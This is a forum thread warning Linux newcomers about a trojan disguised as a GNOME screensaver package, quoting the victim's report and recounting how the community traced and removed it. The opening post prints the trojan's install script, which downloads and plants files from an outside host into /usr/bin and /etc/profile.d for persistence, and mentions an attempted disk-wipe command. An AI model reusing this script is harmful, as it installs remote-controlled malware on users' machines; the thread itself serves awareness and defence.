Announcement

Collapse
No announcement yet.

A WARNING for Newbies about untrusted sites!

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    A WARNING for Newbies about untrusted sites!

    Twenty four hours ago an Ubuntu user downloaded a screen saver from an UNTRUSTED site.

    It was a Trojan.

    The lesson is clear. If you are a newbie DO NOT install files or packages from untrusted sites.

    Here was his cry for help:
    Hello guys Im going to make this breef

    I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.

    after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
    (also no screensaver was ever shown in gnome-screensaver)

    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit


    Im no expert but this looks just wrong!!

    I have removed the package however I i doubt this has done much good...

    Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

    This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?

    Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

    Sorry for sounding strange, Just trying to fix this A.S.A.P.

    Thank you for any suggestions.
    The sequence of events which followed are documented in this Ubuntu forum thread.

    In 19 hours the Trojan was analyzed and traced back to the bad guy's site, which was shut down. During that analysis, bash commands to eliminate the files were worked out in the thread. When the discussion started wondering the thread was closed.

    The OP was lucky. One command in the script apparently tried to run "rm -f /*.*", in an attempt to delete the contents of the hard drive, but the bad guy's syntax is defective. The bulk of the Trojan replaces a couple of GNOME files and puts a script into /etc/profile.d, which gets run every time the user logs in. That script does a wget on the hacker's site to download any upgrades to the Trojan's payload.

    Then, they discovered him:
    http://www.mmowned.com/forums/wow-sc...hing-pack.html

    Look here guys

    Turns out it is a WoW fanboy... most important thing is to get the identity of this person and pull down the file

    he refers to the link in here.. of http://05748.t35.com/ script thing
    Here's his confession:
    The point is that I was dumb enough to think that Ubuntu was secure enough out here in the Linux wonderland that I love so much that I ended up on gnome-look downloading everything that looked cool without examining everything first.
    Within a few hours, by msg #29, the malware had been removed from Gnome-look.org.

    To check their machines after the malware was cleaned off it was recommended that they run
    ps -C wget
    every few hours for a couple days, to see of a wget process is running that they didn't start.

    Then, the following message was found on the bad guy's web site:
    If your reading this from coming from that ubuntu forums place, Well done you saw right thourgh my "Screensaver" cough cough wink wink, I can tell you this. Basically after getting some scripts to run upon start up, It then sets to work downloading another file, This can be changed on my server so in essence i could do whatever i like on your computer, But i only really want to perfrom a DOS (denial of service) attack, For no reason I'm attacking mmowned.com, Just using it as a test. Hats Off!
    Within a few hours, by msg #95, both the screen saver and the bad guy's website had been taken down!

    I can't let this go without mentioning that if you had been running Windows you would still be waiting for "Tuesday Update", IF Microsoft let you know about the exploit at all.
    "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
    – John F. Kennedy, February 26, 1962.

    #2
    Re: A WARNING for Newbies about untrusted sites!

    Thanks GG.

    I am personally appalled by the shameless behavior of the perpetrator.

    This should serve as an example of why it is so important to stick to the official repositories as much as possible. Giving root access to unknown third parties without a thorough vetting is just asking for trouble.
    Welcome newbies!
    Verify the ISO
    Kubuntu's documentation

    Comment


      #3
      Re: A WARNING for Newbies about untrusted sites!

      "When in doubt, chicken out."

      If you can't/won't practice safe computing, don't be surprised when you get bit. I don't care if you run Windowz, Linux, Unix, Apple, or any other OS. It CAN happen to you if you aren't careful.

      If you don't watch out for your PC, someone else will!
      Windows no longer obstructs my view.
      Using Kubuntu Linux since March 23, 2007.
      "It is a capital mistake to theorize before one has data." - Sherlock Holmes

      Comment


        #4
        Re: A WARNING for Newbies about untrusted sites!

        Actually, even if you're an experienced user, don't download things from untrusted sites. You have better things to do than finding and fixing problems created by internet predators and practical jokers.

        That said. even if a download comes from a site that you trust: keep a log of what you download and when, so that, if a problem arises, you have a clue as to what might have caused it.

        Comment


          #5
          Re: A WARNING for Newbies about untrusted sites!

          Thanks askrieger , keeping a log is a brilliant idea for untrusted sites. To me a download has to be some serious program (eg playout software) in which case there is not much chance that people developing it are playing around. I find it hard to understand that someone would think it worth taking a chance on something as frivolous as a screen saver. Perhaps they didn't know why there are trusted repositories and we need to promote that idea a little more. I'm not paranoid, I just don't take chances I don't need to take.

          BTW, there is a discussion about this on slashdot. I must say there is an unusually large proportion of non technical people there. That's why I never call myself a nerd - to distance myself from sites like that.

          Comment


            #6
            Re: A WARNING for Newbies about untrusted sites!

            Originally posted by askrieger
            ......
            That said. even if a download comes from a site that you trust: keep a log of what you download and when, so that, if a problem arises, you have a clue as to what might have caused it.
            That is why I use Synaptic. It's "File --> History" menu option gives a log of installations and removals, subdivided into year-->month-->day. Other front ends do as well, but Synpatic's log is easier to use, IMO.
            "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
            – John F. Kennedy, February 26, 1962.

            Comment


              #7
              Re: A WARNING for Newbies about untrusted sites!

              i just love how fast that whole issue was resloved
              Mark Your Solved Issues [SOLVED]
              (top of thread: thread tools)

              Comment


                #8
                Re: A WARNING for Newbies about untrusted sites!

                The speed of the fix is a typical result of attacks on Linux and its utilities. That's because:

                1) FOSS users can PUBLICLY report any exploits they find without fear of being sued by proprietary corporations trying to protect their profit stream.

                2) FOSS users can post proof of concept codes along with the announcement of an exploit so other FOSS users can test their installation to see if they are susceptible, and to check any fixes that are released to see if they work.

                3) Fixes and patches are releases ASAP, not on some day convenient to a proprietary software house with profit streams to protect.

                That's why Windows has infected computers and malware numbering in the MILLIONS. In July of 2001, a Windows virus called "CodeRed" succeeded in infecting several million Windows boxes in a 24 hour period. The total number of infectious agents in the wild that succeeded in capturing more than a handful of Linux boxes before they were discovered and the patch eliminated them amounts to less than a dozen. The largest number of Linux computers ever infected by a single agent in one incident was in July of 2002, when about 25,000 Linux computers in Eastern Europe, running a bootleg copy of a commercial version of Linux which installed its user as root, were compromised by "Slapper", a web based infectious agent which used a technique similar to Code Red. Users running under their home accounts were not affected.
                "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
                – John F. Kennedy, February 26, 1962.

                Comment

                Working...
                X